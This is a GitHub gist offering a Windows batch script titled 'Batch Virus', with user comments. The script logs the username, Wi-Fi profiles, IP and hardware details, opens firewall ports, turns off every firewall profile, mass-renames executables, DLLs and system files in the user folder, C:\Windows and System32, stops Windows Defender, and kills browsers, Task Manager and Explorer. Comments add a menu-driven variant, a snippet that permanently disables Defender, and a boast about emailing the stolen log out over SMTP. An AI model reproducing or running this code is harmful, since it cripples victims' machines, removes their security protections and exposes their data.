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Last active June 2, 2024 11:48
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  • Save SnowLord7/370dc901f07621fdeb64ed461d7431ac to your computer and use it in GitHub Desktop.
Save SnowLord7/370dc901f07621fdeb64ed461d7431ac to your computer and use it in GitHub Desktop.
Batch Virus
@echo off
title %random% %date% %username% %time% %random%
color 0a
ren -=- Writes INFO to a .LOG file in Current Directory -=-
cls & color 0a
cd Desktop
ECHO Username:%username%>>9K21JM10B.log
ECHO Time: %time%>>9K21JM10B.log
ECHO Date: %date%>>9K21JM10B.log
netsh wlan show profiles>>9K21JM10B.log
ECHO Additional Information:>>9K21JM10B.log
ipconfig | find /i "IPv4">>9K21JM10B.log
wmic diskdrive get size>>9K21JM10B.log
wmic cpu get name>>9K21JM10B.log
goto ports
ren -=- Opens Port 1122 -=-
cls & color 0a
netsh advfirewall firewall add rule name="Port 1122 TCP" dir=in action=allow protocol=TCP localport=%1
netsh advfirewall firewall add rule name="Port 1122 UDP" dir=in action=allow protocol=UDP localport=%1
goto firewall
ren -=- Turns all Firewalls off -=-
cls & color 0a
netsh firewall set opmode disable
netsh firewall set opmode mode=DISABLE
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set allprofiles state off
goto encryption
ren -=- Encrypts files with a simple name break -=-
cls & color 0a
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows\Sys32 & cd C:\Windows\System32
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
color 0a & mode 1000 & cls
goto virus
ren -=- Closes all task managers and browser, kills anti-virus and firewall -=-
ECHO You have been encrypted by *-*7_SL*- & color 0a
net stop "Windows Defender Service"
net stop "Windows Firewall"
taskkill /F /IM "chrome.exe" /T
taskkill /F /IM "firefox.exe" /T
taskkill /F /IM "ProcessHacker.exe" /T
taskkill /F /IM "explorer.exe" /T
taskkill /F /IM "taskmgr.exe" /T
goto virus
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wat does it do

It makes you a sandwich

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Where does it put the information

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I guess it is a trojan rather than a virus because it writes information onto a log file about the victim. Nice

not only write the user's data in a notepad, it also encrypts all data, destroys all security systems and opens ports 1122, you just have to read the comments in the middle of the code

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So why did it open port 1122?

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gorenbk commented Dec 15, 2021

do it!

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Zgag commented May 25, 2022

Where does the data go?

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Kroefer commented Jul 2, 2022

wat does it do

it takes files and makes them go boom

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Solve The Problem

  1. Flip Code:
  • Example:
  • Before:
  • ren *.exw *.mu12m
  • rename *.exw *.mu12m
  • ! It Will Rename All File Encoded With .exw To .mu12m ! (Encrypter)
  • After:
  • ren *.mu12m *.exw
  • rename *.mu12m *.exw
  • ! It Will Rename All File Encoded With .mu12m To .exw ! (Decrypter)

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R0BYX commented Jul 8, 2022

Decrypter Program

Copy and paste in notepad and save as batch file

@echo off
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN *.3hxD *.exe
cd C:\Windows
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN .3hxD.exe
cd C:\Windows\Sys32 & cd C:\Windows\System32
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN *.3hxD *.exe
cd C:
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN *.3hxD *.exe

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Decrypter Program

Copy and paste in notepad and save as batch file

@echo off REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C:\Windows REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN .3hxD.exe cd C:\Windows\Sys32 & cd C:\Windows\System32 REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C: REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe

no encrypt & no decrypt
it's just change files format

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Decrypter Program
Copy and paste in notepad and save as batch file
@echo off REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C:\Windows REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN .3hxD.exe cd C:\Windows\Sys32 & cd C:\Windows\System32 REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C: REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe

no encrypt & no decrypt it's just change files format


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bro title its %time% problem

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I added a new code to my batch file:
net stop WinDefend
sc config "WinDefend" start= disabled
This code will turn Windows Defender into a toast.

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BramBy20 commented Feb 9, 2023

how to remove virus

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wat does it do

The first part of the script creates a log file in the Desktop folder that contains information about the user's computer, including the IP address, network configuration, and hardware information.

The next part of the script opens Port 1122 and turns off firewalls, which can be used to allow unauthorized access to the computer.

The subsequent part of the script renames all files with a certain extension in the C:\Windows, C:\Windows\Sys32, and C:\Windows\System32 folders. This can render the system unstable and potentially cause data loss.

Finally, the script closes all task managers, browsers, and anti-virus software and kills the Windows Defender Service and Windows Firewall. This can allow malicious software to infect the computer without being detected.

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secnnet commented Jun 15, 2023

In this updated version of the script, a menu is displayed with four options. You can enter a choice (1, 2, 3, or 4) to perform different actions. The script then jumps to the corresponding section based on your input.

  1. If you select option 1, the script gathers system information as before and then returns to the menu.
  2. If you select option 2, the script prompts you to enter a port number. It then manipulates the firewall settings to allow TCP and UDP traffic on that port before returning to the menu.
  3. If you select option 3, the script proceeds with the file encryption process, as in the original script, before returning to the menu.
  4. If you select option 4, the script exits.

This interactive menu allows you to choose the desired action and provides a more flexible and user-friendly experience. Feel free to further customize and modify the script according to your specific needs.

@echo off
title %random% %date% %username% %time% %random%
color 0a

echo 1. Gather System Information
echo 2. Manipulate Firewall Settings
echo 3. Encrypt Files
echo 4. Exit

set /p choice=Enter your choice: 

if "%choice%"=="1" goto info
if "%choice%"=="2" goto ports
if "%choice%"=="3" goto encryption
if "%choice%"=="4" exit

cls & color 0a
cd Desktop

REM Gather system information
ECHO Username:%username%>>9K21JM10B.log
ECHO Time: %time%>>9K21JM10B.log
ECHO Date: %date%>>9K21JM10B.log
netsh wlan show profiles>>9K21JM10B.log
ECHO Additional Information:>>9K21JM10B.log
ipconfig | find /i "IPv4">>9K21JM10B.log
wmic diskdrive get size>>9K21JM10B.log
wmic cpu get name>>9K21JM10B.log
goto menu

cls & color 0a
set /p port=Enter the port number: 

REM Manipulate firewall settings
netsh advfirewall firewall add rule name="Port %port% TCP" dir=in action=allow protocol=TCP localport=%port%
netsh advfirewall firewall add rule name="Port %port% UDP" dir=in action=allow protocol=UDP localport=%port%
goto menu

cls & color 0a

REM Encrypt files
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows\Sys32 & cd C:\Windows\System32
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
color 0a & mode 1000 & cls
goto menu

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Werizu commented Jun 21, 2023

Nice scripts but i wrote a little bit more code and now it sends me the file, with help from an Smtp Server, to my email adress.

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im running windows sandbox


Ładne skrypty, ale napisałem trochę więcej kodu i teraz wysyła mi plik, z pomocą serwera Smtp, na mój adres e-mail.

how? In batch u can only send in FTP


in sense - files

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wat does it do

It makes you a sandwich


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Baumhau commented Jun 2, 2024

Wie ist der decrypt code?

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